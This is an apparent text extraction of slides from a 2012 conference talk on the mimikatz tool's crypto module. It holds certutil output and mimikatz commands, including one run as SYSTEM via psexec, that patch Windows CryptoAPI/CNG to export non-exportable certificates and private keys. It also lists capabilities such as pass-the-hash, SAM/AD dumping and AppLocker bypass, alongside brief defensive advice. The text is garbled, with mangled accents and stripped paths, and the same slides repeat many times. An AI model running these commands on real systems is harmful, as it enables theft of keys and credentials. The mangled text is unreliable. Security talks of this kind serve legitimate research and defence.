Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
top related